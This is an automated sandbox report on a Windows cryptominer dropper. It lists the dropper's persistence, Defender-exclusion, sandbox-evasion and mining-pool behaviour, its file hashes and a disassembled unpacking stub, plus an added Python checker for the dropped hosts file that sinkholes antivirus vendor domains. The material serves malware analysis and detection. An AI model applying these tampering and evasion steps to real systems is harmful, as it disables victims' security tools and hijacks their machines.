                  Signatures: Uses powercfg.exe to modify the power settings; Modifies the hosts file; Adds a directory exclusion to Windows Defender
                  Started: powershell.exe [22] (Loading BitLocker PowerShell Module) -> conhost.exe; cmd.exe [1] -> conhost.exe, wusa.exe; powercfg.exe [1] -> conhost.exe; 12 other processes -> conhost.exe, 11 other processes

                explorer.exe (started by updater.exe)
                  Network: 162.19.224.121, 10343, 49704 CENTURYLINK-US-LEGACY-QWESTUS United States
                  Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

                Source | Detection | Scanner | Label
                TwrhjEKqxk.exe | 55% | ReversingLabs | Win64.Trojan.Cerbu
                TwrhjEKqxk.exe | 46% | Virustotal |
                TwrhjEKqxk.exe | 100% | Avira | HEUR/AGEN.1362845

                Source | Detection | Scanner | Label
                C:\ProgramData\Google\Chrome\updater.exe | 100% | Avira | HEUR/AGEN.1362845
                C:\ProgramData\Google\Chrome\updater.exe | 55% | ReversingLabs | Win64.Trojan.Cerbu
                C:\ProgramData\Google\Chrome\updater.exe | 46% | Virustotal |
                C:\Windows\Temp\mnidgyzvuran.sys | 5% | ReversingLabs |
                C:\Windows\Temp\mnidgyzvuran.sys | 4% | Virustotal |

                No Antivirus matches

                Source | Detection | Scanner | Label
                xmr-eu1.nanopool.org | 5% | Virustotal |

                Source | Detection | Scanner | Label
                http://ocsp.cloudflare.com/origin_ca0 | 0% | Virustotal |
                http://crl.cloudflare.com/origin_ca.crl0 | 0% | Virustotal |
                http://crl.cloudflare.com/origin_ca.crln | 0% | Virustotal |
                http://crl.cloudflare.com/origin_ca.crl | 0% | Virustotal |
                https://xmrig.com/docs/algorithms | 2% | Virustotal |
                http://ocsp.cloudflare.com/origin_ca | 0% | Virustotal |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                xmr-eu1.nanopool.org | 54.37.137.114 | true | true | | unknown

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://crl.cloudflare.com/origin_ca.crl0 | explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://ocsp.cloudflare.com/origin_ca | explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://crl.cloudflare.com/origin_ca.crln | explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://ocsp.cloudflare.com/origin_ca0 | explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://crl.cloudflare.com/origin_ca.crl | explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://xmrig.com/docs/algorithms | updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                162.19.224.121 | unknown | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1527556
                Start date and time:2024-10-07 03:02:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:63
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:TwrhjEKqxk.exe
                renamed because original name is a hash value
                Original Sample Name:dbf8d8ef015846d4078466a7c1d3f41c.exe
                Detection:MAL
                Classification:mal100.adwa.spyw.evad.mine.winEXE@82/13@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 9
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 93.184.221.240, 13.95.31.18
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Not all processes were analyzed; report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                Time | Type | Description
                03:02:52 | Task Scheduler | Run new task: {040FC3BF-8CDC-41EC-B1EE-D555FF3E6D13} path: .
                21:03:02 | API Interceptor | 1x Sleep call for process: TwrhjEKqxk.exe modified
                21:03:04 | API Interceptor | 36x Sleep call for process: powershell.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                162.19.224.121Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                  ft1i6jvAdD.exeGet hashmaliciousXmrigBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    xmr-eu1.nanopool.orgaA45th2ixY.exeGet hashmaliciousXmrigBrowse
                    • 162.19.224.121
                    S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                    • 162.19.224.121
                    Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    file.exeGet hashmaliciousXmrigBrowse
                    • 163.172.154.142
                    BWP2uPDDxw.exeGet hashmaliciousXmrigBrowse
                    • 163.172.154.142
                    BkkZPdT1uc.exeGet hashmaliciousXmrigBrowse
                    • 54.37.232.103
                    Chrome.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    SetLoader.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    ekBTbONX85.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                    • 212.47.253.124
Match                         | Associated Sample Name / URL                 | Detection | Threat Name  | Context
CENTURYLINK-US-LEGACY-QWESTUS | ZEjcJZcrXc.elf                               | malicious | Mirai        | 75.174.251.9
                              | na.elf                                       | malicious | Unknown      | 63.231.92.27
                              | na.elf                                       | malicious | Mirai, Okiru | 207.109.44.206
                              | na.elf                                       | malicious | Mirai, Okiru | 67.134.44.127
                              | na.elf                                       | malicious | Mirai, Okiru | 75.122.160.50
                              | na.elf                                       | malicious | Mirai        | 97.124.122.92
                              | na.elf                                       | malicious | Mirai        | 65.128.41.3
                              | https://rondoc-b7ce.lvauayt.workers.dev/     | malicious | HTMLPhisher  | 162.19.58.159
                              | https://meaoee-fc3f.elamzioehr.workers.dev/  | malicious | HTMLPhisher  | 162.19.58.157
                              | na.elf                                       | malicious | Mirai        | 67.134.44.140
                    No context
Match                            | Associated Sample Name / URL                   | Detection | Threat Name
C:\Windows\Temp\mnidgyzvuran.sys | aA45th2ixY.exe                                 | malicious | Xmrig
                                 | 1mqzOM6eok.exe                                 | malicious | Xmrig
                                 | updater.exe                                    | malicious | Xmrig
                                 | 7QiAmg58Jk.exe                                 | malicious | Metasploit, Meterpreter, Xmrig
                                 | LnK0dS8jcA.exe                                 | malicious | Xmrig
                                 | file.exe                                       | malicious | Xmrig
                                 | SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe | malicious | Xmrig
                                 | file.exe                                       | malicious | Amadey, BitCoin Miner, SilentXMRMiner
                                 | S0FTWARE.exe                                   | malicious | Go Injector, Vidar, Xmrig
                                 | Gw2G72kSsY.exe                                 | malicious | Xmrig
                                        Process:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):8538008
                                        Entropy (8bit):7.9153349904935055
                                        Encrypted:false
                                        SSDEEP:196608:Y824DtCO9i9nwi6rEv5sv+1E5TOt8mua+Wnm3hsQGmGu0r8f6ha:YWhn9iGvTvcE8t8mMWn+7gh
                                        MD5:DBF8D8EF015846D4078466A7C1D3F41C
                                        SHA1:67D156457E6028ADDC00CDD3A2E595D7C7A00466
                                        SHA-256:D50ECB2FA3AFEE2D23F9F952201E01898E191E9D475F44BC1C146C49C4EFE4BB
                                        SHA-512:21D65ED89FCE09FD847F39BF7AC5D058521276F65A770B51B1F7E87B86C7A815BCAA58CA1B5474F05B0E3DE55D28923273E1E8C6FF1509B5748C1C247978218B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 55%
• Antivirus: Virustotal, Detection: 46%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........l.....p..........@....................................Z....`.................................................B0n.d....Pn.H....3..............................................(@n.(................................................... &........o.................. ..` .*... ..C....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m......0R.............@..@ ......n......2R.............@... P.....n.n....4R.............@..@ x.... n.i....6R.............@..B.imports.....0n......8R.............@....tls.........@n......:R..................rsrc........Pn......<R.............@..@.themida.`T..`n......@R.............`....boot...../......./..@R.............`..`.reloc.................................@........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulJnp/p:NllU
                                        MD5:BC6DB77EB243BF62DC31267706650173
                                        SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                        SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                        SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                        Malicious:false
                                        Preview:@...e.................................X..............@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1510207563435464
                                        Encrypted:false
                                        SSDEEP:3:NlllulvX/Z:NllUvX
                                        MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                        SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                        SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                        SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2748
                                        Entropy (8bit):4.269302338623222
                                        Encrypted:false
                                        SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                        MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                        SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                        SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                        SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
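The dropped hosts file above keeps Microsoft's default header and appends entries that null-route three security vendors' domains (avast.com, totalav.com, scanguard.com) to 0.0.0.0, so the victim can no longer reach their download or update servers. As an added example that is not part of the Joe Sandbox report, the Python below parses a hosts file and flags every active mapping that points a watch-listed security-vendor domain at an unspecified or loopback address. The hosts content is constructed to mirror the preview, and the vendor watch-list is an assumption to be extended for the products in your own estate.

```python
import ipaddress

# Constructed sample mirroring the dropped hosts file shown in the report:
# Microsoft's default header (commented-out localhost lines) followed by the
# null-routed security-vendor domains. Not the actual dropped file.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 totalav.com
0.0.0.0 www.totalav.com
0.0.0.0 scanguard.com
0.0.0.0 www.scanguard.com
"""

# Assumed watch-list of security-vendor registrable domains. The three here
# are the ones in the sample; extend it for the products in your estate.
SECURITY_VENDOR_DOMAINS = {"avast.com", "totalav.com", "scanguard.com"}


def is_sinkhole(addr: str) -> bool:
    """True for addresses that make a name unreachable: 0.0.0.0, ::, and
    anything in the IPv4/IPv6 loopback ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_unspecified or ip.is_loopback


def parse_hosts(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, address, hostname) for every active mapping.

    Text after '#' is a comment, so the commented-out localhost entries in
    the Windows default file are skipped; one address may carry several names.
    """
    entries = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            entries.append((no, addr, name.lower().rstrip(".")))
    return entries


def registrable(name: str) -> str:
    """Last two labels of a hostname. Sufficient for the watch-list above;
    a real deployment would use the public suffix list for ccTLDs."""
    parts = name.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name


def find_blocked_vendors(text: str) -> list[dict]:
    """Return every active hosts entry that sinks a watch-listed vendor domain."""
    hits = []
    for no, addr, name in parse_hosts(text):
        vendor = registrable(name)
        if is_sinkhole(addr) and vendor in SECURITY_VENDOR_DOMAINS:
            hits.append({"line": no, "address": addr, "host": name, "vendor": vendor})
    return hits


if __name__ == "__main__":
    for hit in find_blocked_vendors(SAMPLE_HOSTS):
        print(f"line {hit['line']}: {hit['host']} -> {hit['address']} ({hit['vendor']})")
```

On a live Windows host the input is `%SystemRoot%\System32\drivers\etc\hosts`; the commented-out `127.0.0.1 localhost` lines of the stock file are deliberately ignored, so a clean default file produces no hits, while any hosts file whose hash differs from the stock file is worth a look even when this check is silent.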
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):14544
                                        Entropy (8bit):6.2660301556221185
                                        Encrypted:false
                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
• Antivirus: Virustotal, Detection: 4%
                                        Joe Sandbox View:
• Filename: aA45th2ixY.exe, Detection: malicious
• Filename: 1mqzOM6eok.exe, Detection: malicious
• Filename: updater.exe, Detection: malicious
• Filename: 7QiAmg58Jk.exe, Detection: malicious
• Filename: LnK0dS8jcA.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: S0FTWARE.exe, Detection: malicious
• Filename: Gw2G72kSsY.exe, Detection: malicious
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):7.9153349904935055
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:TwrhjEKqxk.exe
                                        File size:8'538'008 bytes
                                        MD5:dbf8d8ef015846d4078466a7c1d3f41c
                                        SHA1:67d156457e6028addc00cdd3a2e595d7c7a00466
                                        SHA256:d50ecb2fa3afee2d23f9f952201e01898e191e9d475f44bc1c146c49c4efe4bb
                                        SHA512:21d65ed89fce09fd847f39bf7ac5d058521276f65a770b51b1f7e87b86c7a815bcaa58ca1b5474f05b0e3de55d28923273e1e8c6ff1509b5748c1c247978218b
                                        SSDEEP:196608:Y824DtCO9i9nwi6rEv5sv+1E5TOt8mua+Wnm3hsQGmGu0r8f6ha:YWhn9iGvTvcE8t8mMWn+7gh
                                        TLSH:0F863340EFE9B8CFE3C97CB99707381D8A58B76901E55C91B04F9A0D258368534EBAD3
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........l.....p..........@....................................Z.....`........................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x140c2c370
                                        Entrypoint Section:.boot
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66FED9FB [Thu Oct 3 17:52:59 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:35a81d16af9f2ba6d515f11152d0364b
                                        Instruction
                                        call 00007F9DE50BA827h
                                        inc ecx
                                        push edx
                                        dec ecx
                                        mov edx, esp
                                        inc ecx
                                        push edx
                                        dec ecx
                                        mov esi, dword ptr [edx+10h]
                                        dec ecx
                                        mov edi, dword ptr [edx+20h]
                                        cld
                                        mov dl, 80h
                                        mov al, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        mov byte ptr [edi], al
                                        dec eax
                                        inc edi
                                        mov ebx, 00000002h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA686h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA700h
                                        xor eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA7A8h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        je 00007F9DE50BA6ABh
                                        push edi
                                        mov eax, eax
                                        dec eax
                                        sub edi, eax
                                        mov al, byte ptr [edi]
                                        pop edi
                                        mov byte ptr [edi], al
                                        dec eax
                                        inc edi
                                        mov ebx, 00000002h
                                        jmp 00007F9DE50BA62Ah
                                        mov eax, 00000001h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
